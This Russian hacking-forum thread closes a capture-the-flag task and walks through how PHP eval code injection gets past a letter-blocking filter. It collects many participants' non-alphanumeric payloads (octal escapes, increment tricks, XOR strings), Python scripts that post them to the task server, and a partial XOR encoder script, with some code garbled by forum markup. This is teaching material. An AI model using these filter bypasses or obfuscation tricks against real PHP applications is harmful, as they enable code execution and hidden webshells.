 |
|
16.01.2019, 20:27
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Сообщение от FriLL
↑
Как это работает??
Можно более подробно объяснить???
${"_".(";"^"|").(">"^"{").("{"^"/")}[_]() - что тут происходит?
Объяснения будут во время закрытия задания, или чуть позже.
|
|
|
16.01.2019, 20:28
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
|
|
|
|
16.01.2019, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
|
|
|
|
17.01.2019, 02:13
|
|
Новичок
Регистрация: 23.12.2018
Сообщений: 15
С нами:
3890486
Репутация:
6
|
|
done/23chr
|
|
|
|
17.01.2019, 15:24
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами:
5713526
Репутация:
145
|
|
В связи с тем,что активность последние дни была практически нулевой - мной было принято решение не много отклониться от правил, но в целом сохранить общую концепцию.Так как решения по таску 2 перестали присылать я решил сфокусироваться на активной аудитории, которая решила таск 2 и начала думать как можно решить другими способами, в том числе самым коротким вариантом.В связи с чем я закрываю основную часть заданияно продолжу принимать мини-задачу до субботы.Что касается "Вот же решение - кому то халявная репа". С момента, как я стал выкладывать короткие варианты - мне прислали только1решение таска и оно было абсолютно другим,поэтому халявы тут нет и не будет.Так же парни, которые писали "Прошел" и не присылали пруфы и которым ставили репутацию - остались без нее. Простите, но я не верю на слово.Что касается решений и их разбора.Этим я займусь в выходные,опубликую все ваши решения,скрипты, которые вы присылали, а так же сделаю разбор некоторых вариантов решения.
|
|
|
|
20.01.2019, 02:39
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами:
5713526
Репутация:
145
|
|
С момента запуска второго таска прошло 2 недели, а это значит самое время подвести итоги и закрыть все задания.Логи показывают что активность есть, есть интерес к решению задач не очевидными способами.Это очень здорово,все кто решал - молодцы.Все кто решал и по каким то причинам не смог решить - не стоит расстраиваться.Будут еще задачи где вы сможете проявить себя.Мы стараемся реализовывать задачи таким образом,что бы вы научились смотреть на код несколько иначе,чем вы смотрите сейчас,учились правильно искать нужную информацию и применять в своих целях. Уверен, спустя некоторое время вы эти и последующие задачи будете решать играючи.
Теперь что касается содержания данного поста.Первая часть будет посвящена разбору некоторых возможных вариантов решения.Я позволил себе некоторую вольность и условно разделил все решения на 2 вида:
Поэтому я распишу один элементарный способ решения с цифрами и пару способов без них.Когда вы поймете принцип - вам будет не сложно разобраться со всеми остальными вариантами. Во второй части будут ваши решения/программы и другой доп.материал, который вы мне скинули.
Итак.Заходим на http://task2.antichat.com и первое что бросается в глаза это форма и ее название. Из этого делаем вывод, что мы имеем калькулятор и input для ввода данных. Пробуем ввести 1 + 3 и получаем как и ожидалось 4. Пробуем ввести abc и получаем "Hacker Detected!!!". Картина постепенно вырисовывается. Пробуем посмотреть исходный код страницы в надежде получить какую либо доп.информацию.В итоге обнаруживаем ссылку на сорцы:
Отлично, проходим по ссылке и видим следующее:
PHP код:
[COLOR="#000000"]
Evil Calculator
[COLOR="#0000BB"]Result'[/COLOR][COLOR="#007700"];
eval([/COLOR][COLOR="#DD0000"]'print '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'input'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
else
echo[/COLOR][COLOR="#DD0000"]"Hacker Detected!!!"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
Source Code -->
[/COLOR]
Уже что то.Видим eval и видим preg_match. Понимаем, что здесь классическое RCE и начинаем думать как можно обойти preg_match, который нам напрямую запрещает использовать алфавит.На помощь приходит документация по php. Так как мы работаем со строками,есть смысл заглянуть в документацию по строкам php и посмотреть, какие возможности они нам предоставляют.Заходим в документацию: http://php.net/manual/ru/language.types.string.php и начинаем ее изучать. Листаем не много до"Управляющие последовательности"и видим следующее:
Сообщение от None
\[0-7]{1,3} последовательность символов, соответствующая регулярному выражению символа в восьмеричной системе счисления, который молча переполняется, чтобы поместиться в байт (т.е. "\400" === "\000")
.SpoilerTarget" type="button">Spoiler: Решение
Код:
"\160\150\160\151\156\146\157"()
В конечном итоге получаем вывод функции phpinfo().
Теперь разберем пару вариантов без цифр. В php инкремент работает не только на цифрах,но и на буквах, следовательно такой код имеет место быть:
[PHP]
[COLOR="#000000"][COLOR="#0000BB"]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$_<font color="#007700">
.SpoilerTarget" type="button">Spoiler: Решение
</font>[COLOR="#007700"]= [];
[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'!'[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$____[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$____[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$____[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$____[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]++;[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$_______[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_______[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$___[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$____[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_____[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$______[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_______[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR]
[/COLOR]
Вариант с XOR разобран детально здесь:https://sinister.ly/Thread-How-To-Wr...-PHP-Backdoors . Если вкратце, то нам нужно найти такую комбинацию из двух строк,результатом XOR которых будет нужная буква:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]var_dump[COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'^'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//p[/COLOR][/COLOR]
[/COLOR]
Вот пример решения:
.SpoilerTarget" type="button">Spoiler: Решение
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#DD0000"]'^'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]'('[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]'^'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]'='[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'['[/COLOR][COLOR="#007700"]).([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"]);${[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]()}[/COLOR][/COLOR]
Крайне сложно все охватить в одном посте, поэтому тем, кто захочет копнуть глубже, или рассмотреть варианты с $_GET например, то если загуглитьphp bypass alphaи/илиnon-alphanumeric php code[COLOR="#bfbfbf"]вы найдете ответы на все интересующие вас вопросы. Теперь перейдем к решениям:
.SpoilerTarget" type="button">Spoiler: Решения TASK2
@l1ght
Сообщение от l1ght
↑
$__[]='';$_="".$__;$_0=$_[3];$_0++;$_0++;$_0++;$_0++;$_0++;$_6=$_0;$_0++;$_0++ ;$_2=$_0;$_0++;$_4=$_0;$_0++;$_0++;$_0++;$_0++;$_0 ++;$_5=$_0;$_0++;$_7=$_0;$_0++;$_1=$_3=$_0;$_8=$_1 .$_2.$_3.$_4.$_5.$_6.$_7;$_8()
Сообщение от l1ght
↑
input=1;$_="\160\150\160\151\156\146\157";$_()
Сообщение от l1ght
↑
${~"%a0%b8%ba%ab"}[%aa]() ?%aa=phpinfo
Сообщение от monotrue
↑
""; $пхпинфо="\160\150\160\151\156\146\157"; $пхпинфо()
Сообщение от cat1vo
↑
1. [a-zA-Z`] - ${"\160\150\160\151\156\146\157"()}
2. [a-zA-Z0-9`] - $_=('^'^'.').('('^'@').('^'^'.').(')'^'@').('.'^'@ ').('='^'[').('/'^'@');${$_()}
Сообщение от OneManTeam
↑
1;
$__++;
$__=$__.[];
$_______________++;
$___=$__[$_______________++];
$____= $___;
$____=$____++;$____++;$____++;$____++;$____++;$___ _++;$____++;$____++;$____++;$____++;$____++;$____+ +;$____++;$____++;$____++;$____++;
$_____=$___;
$_____=$_____++;$_____++;$_____++;$_____++;$_____+ +;$_____++;$_____++;$_____++;
$______=$___;
$______=$______++;$______++;$______++;$______++;$_ _____++;$______++;$______++;$______++;$______++;
$_______=$___;
$_______=$_______++;$_______++;$_______++;$_______ ++;$_______++;$_______++;$_______++;$_______++;$__ _____++;$_______++;$_______++;$_______++;$_______+ +;$_______++;
$________=$___;
$________=$________++;$________++;$________++;$___ _____++;$________++;$________++;
$_________=$___;
$_________=$_________++;$_________++;$_________++; $_________++;$_________++;$_________++;$_________+ +;$_________++;$_________++;$_________++;$________ _++;$_________++;$_________++;$_________++;$______ ___++;
$__________=$____.$_____.$____.$______.$_______.$_ _______.$_________;
$__________();
Сообщение от crabovwik
↑
1 + 1;"\160\150\160\151\156\146\157"();
Сообщение от =HALK=
↑
"\160\150\160\151\156\146\157"()
Сообщение от oleg_1va
↑
$_="\160\162\151\156\164\137\162";
$__="\160\150\160\151\156\146\157";
$_($__());
Сообщение от MichelleBoxing
↑
"\160\150\160\151\156\146\157"()
Сообщение от Gorbachev
↑
"";$похек="\160\150\160\151\156\146\157";$п хек()
Сообщение от dais
↑
$_="\160\150\160\151\156\146\157";$_();
Сообщение от dais
↑
$__
=(
$_
^
$__
);
$__
++;
$__
++;
$__
++;
$_
=[];
$_
=
"
$_
"
;
$_
=
$_
[
$__
];
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$__
=
$_
;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$__
++;
$___
=
$__
;
$____
.=
$___
;
$____
();
Сообщение от b3
↑
"\160\150\160\151\156\146\157"();
Сообщение от Franky_T
↑
"\160\150\160\151\156\146\157"()
Сообщение от xmp
↑
$_=[];
$_=@"$_";
$_=$_['!'=='@'];
$___=$_;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_ _++;$__++;$__++;$__++;$__++;$__++;$__++;
$___=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_ _++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_ _++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_ _++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$_=$$____;
$___();
Сообщение от xmp
↑
"\160\150\160\151\156\146\157"();
Сообщение от qwaszx000
↑
"\160\150\160\151\156\146\157"()
Сообщение от grimnir
↑
$_=('^'^'.').('('^'@').('^'^'.').(')'^'@').('.'^'@ ').('='^'[').('/'^'@');${$_()}
Сообщение от redscout
↑
"\160\150\160\151\156\146\157"()
Сообщение от redscout
↑
"\160\162\151\156\164\137\162"("\147\145\164\137\1 44\145\146\151\156\145\144\137\146\165\156\143\164 \151\157\156\163"()["\151\156\164\145\162\156\141\154"][383]())
Сообщение от Jerri
↑
import requests data={"input": '$_ = \"\\143\\150\\162\"; $___ = $_(112).$_(104).$_(112).$_(105).$_(110).$_(102).$_ (111); $___()'} r = requests.post("
http://task.antichat.com:10002/
", data=data)
Сообщение от Jerri
↑
import requests com = "phpinfo" arg = "-1" data={"input": '$_ = \"_\\120\\117\\123\\124\"; $__ = ${$_}; $__[23]($__[24]);', 23: com, 24: arg} r = requests.post("
http://task.antichat.com:10002/
", data=data) print(r.content)
Сообщение от rudi
↑
"\160\150\160\151\156\146\157"()
Сообщение от Deathdreams
↑
"\160\150\160\151\156\146\157"()
Сообщение от Alaich
↑
"\160\150\160\151\156\146\157"()
[QUOTE="unstppbl"]
↑
http://task.antichat.com:10002/?_=phpinfo
'';$_="{";$_=($_^";").($_^"/");?>;").($_^"/");?>
Так же хочу отметить отдельно @D3N . Он решил написать "Генератор-Переводчик".Выкладываю его здесь,вдруг кому пригодится.
[PHP]
[COLOR="#000000"] ';
$arr[] ='?';
$arr[] ='@';
$arr[] ='[';
$arr[] =']';
$arr[] ='^';
$arr[] ='_';
$arr[] ='`';
$arr[] ='{';
$arr[] ='|';
$arr[] ='}';
$arr[] ='~';
$arr[] ='`';
$arr[] ='';
$arr[] ='‚';
$arr[] ='ƒ';
$arr[] ='„';
$arr[] ='…';
$arr[] ='†';
$arr[] ='‡';
$arr[] ='ˆ';
$arr[] ='‰';
$arr[] ='Š';
$arr[] ='‹';
$arr[] ='Œ';
$arr[] ='';
$arr[] ='Ž';
$arr[] ='';
$arr[] ='';
$arr[] ='‘';
$arr[] ='’';
$arr[] ='“';
$arr[] ='”';
$arr[] ='•';
$arr[] ='–';
$arr[] ='—';
$arr[] ='˜';
$arr[] ='™';
$arr[] ='š';
$arr[] ='›';
$arr[] ='œ';
$arr[] ='';
$arr[] ='ž';
$arr[] ='Ÿ';
$arr[] ='¡';
$arr[] ='¢';
$arr[] ='£';
$arr[] ='¤';
$arr[] ='¥';
$arr[] ='¦';
$arr[] ='§';
$arr[] ='¨';
$arr[] ='©';
$arr[] ='ª';
$arr[] ='«';
$arr[] ='¬';
$arr[] ='%';
$arr[] ='®';
$arr[] ='¯';
$arr[] ='°';
$arr[] ='±';
$arr[] ='²';
$arr[] ='³';
$arr[] ='´';
$arr[] ='µ';
$arr[] ='¶';
$arr[] ='·';
$arr[] ='¸';
$arr[] ='¹';
$arr[] ='º';
$arr[] ='»';
$arr[] ='¼';
$arr[] ='½';
$arr[] ='¾';
$arr[] ='¿';
$arr[] ='À';
$arr[] ='Á';
$arr[] ='Â';
$arr[] ='Ã';
$arr[] ='Ä';
$arr[] ='Å';
$arr[] ='Æ';
$arr[] ='Ç';
$arr[] ='È';
$arr[] ='É';
$arr[] ='Ê';
$arr[] ='Ë';
$arr[] ='Ì';
$arr[] ='Í';
$arr[] ='Î';
$arr[] ='Ï';
$arr[] ='Ð';
$arr[] ='Ñ';
$arr[] ='Ò';
$arr[] ='Ó';
$arr[] ='Ô';
$arr[] ='Õ';
$arr[] ='Ö';
$arr[] ='×';
$arr[] ='Ø';
$arr[] ='Ù';
$arr[] ='Ú';
$arr[] ='Û';
$arr[] ='Ü';
$arr[] ='Ý';
$arr[] ='Þ';
$arr[] ='ß';
$arr[] ='à';
$arr[] ='á';
$arr[] ='â';
$arr[] ='ã';
$arr[] ='ä';
$arr[] ='å';
$arr[] ='æ';
$arr[] ='ç';
$arr[] ='è';
$arr[] ='é';
$arr[] ='ê';
$arr[] ='ë';
$arr[] ='ì';
$arr[] ='í';
$arr[] ='î';
$arr[] ='ï';
$arr[] ='ð';
$arr[] ='ñ';
$arr[] ='ò';
$arr[] ='ó';
$arr[] ='ô';
$arr[] ='õ';
$arr[] ='ö';
$arr[] ='÷';
$arr[] ='ø';
$arr[] ='ù';
$arr[] ='ú';
$arr[] ='û';
$arr[] ='ü';
$arr[] ='ý';
$arr[] ='þ';
$arr[] ='ÿ';
// Разрешенные для перевода символы.
$cap_letters[] ='A';
$cap_letters[] ='B';
$cap_letters[] ='C';
$cap_letters[] ='D';
$cap_letters[] ='E';
$cap_letters[] ='F';
$cap_letters[] ='G';
$cap_letters[] ='H';
$cap_letters[] ='I';
$cap_letters[] ='J';
$cap_letters[] ='K';
$cap_letters[] ='L';
$cap_letters[] ='M';
$cap_letters[] ='N';
$cap_letters[] ='O';
$cap_letters[] ='P';
$cap_letters[] ='Q';
$cap_letters[] ='R';
$cap_letters[] ='S';
$cap_letters[] ='T';
$cap_letters[] ='U';
$cap_letters[] ='V';
$cap_letters[] ='W';
$cap_letters[] ='X';
$cap_letters[] ='Y';
$cap_letters[] ='Z';
$letters[] ='a';
$letters[] ='b';
$letters[] ='c';
$letters[] ='d';
$letters[] ='e';
$letters[] ='f';
$letters[] ='g';
$letters[] ='h';
$letters[] ='i';
$letters[] ='j';
$letters[] ='k';
$letters[] ='l';
$letters[] ='m';
$letters[] ='n';
$letters[] ='o';
$letters[] ='p';
$letters[] ='q';
$letters[] ='r';
$letters[] ='s';
$letters[] ='t';
$letters[] ='u';
$letters[] ='v';
$letters[] ='w';
$letters[] ='x';
$letters[] ='y';
$letters[] ='z';
$xors= array();
for ($i=0;$i$arr[$i] ^$arr[$j],'x1'=>$arr[$i],'x2'=>$arr[$j]);
$xors[] =$temp;
}
}
}
// фраза которую нужно "пер вести"
$command="phpinfo";
$comm_array=str_split($command);
$result="";
for ($j=0;$j!
|
|
|
|
20.01.2019, 02:59
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от None
l1ght said:
↑
${~"%a0%b8%ba%ab"}[%aa]() ?%aa=phpinfo Шикарно!
|
|
|
|
20.01.2019, 03:21
|
|
Новичок
Регистрация: 08.01.2019
Сообщений: 4
С нами:
3867446
Репутация:
0
|
|
Огромное спасибо за разборчики и решения, ну и спасибо @D3N за переводчик!
Вообще, я начинающий в этом деле, приятно видеть что тут поддерживают новичков, а не пытаются закрыться от них гигантскими хайдами.
Взял новые знания на вооружение. |
|
|
|
20.01.2019, 05:24
|
|
Участник форума
Регистрация: 06.07.2017
Сообщений: 222
С нами:
4660886
Репутация:
5
|
|
Блин, переводчик - тема! Спасибо @D3N |
|
|
|
20.01.2019, 05:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от crlf
↑
Шикарно!
победил dooble, двойные ковычки там лишние
Сообщение от dooble
↑
Кстати, шутка зашла, пересчитал, точно - 13
.
Но это, когда нагрузка делится get+post.
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
